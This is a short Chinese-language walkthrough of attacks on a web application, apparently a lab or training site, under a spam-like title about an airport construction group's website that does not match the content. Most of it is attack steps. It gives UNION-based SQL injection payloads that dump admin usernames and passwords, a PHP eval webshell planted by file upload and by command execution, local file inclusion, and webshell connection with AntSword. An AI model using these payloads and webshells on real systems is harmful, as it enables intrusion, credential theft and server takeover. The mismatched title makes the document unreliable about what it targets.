黑龙江省机场建设集团官网网站怎么在百度上发表文章
寻找漏洞
一,我们打开页面
第一个漏洞
xss漏洞
1.在登录页面显示有弹窗
第二个漏洞
sql注入漏洞
1.在输入框的地方输入-1 union select 1,2,3#我们来查看他的回显点
2.查看数据库表名
-1 union select 1,database(),3#
3.查看表名
-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test'#
4.查看admin中的列名
-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test' and table_name='admin'#
5.查看账号密码
-1 union select 1,2,group_concat(user_id,user_name,user_pass) from admin#
6.成功登录进来
第三个漏洞
文件上传漏洞
1.我们登录进去往下滑有个上传文件我们上传一个1.php
<?php @eval($_POST['cmd']);?>
2.用蚁剑连接一下
第四个漏洞
命令执行漏洞
1.页面下方有一个执行框,输入ls查看
2.输入echo '<?php phpinfo();?>' > wff.php 访问wff.php
3.写入一句话木马,访问1.php
echo '<?php @eval($_POST['cmd']);?>' > 1.php
4.蚁剑连接
第五个漏洞
文件包含漏洞
1.在关于页面中发现存在文件包含漏洞
2.通过访问之前写入的wff.php查看,远程文件包含关闭,本地文件可以访问
3.访问1.php
4.蚁剑连接
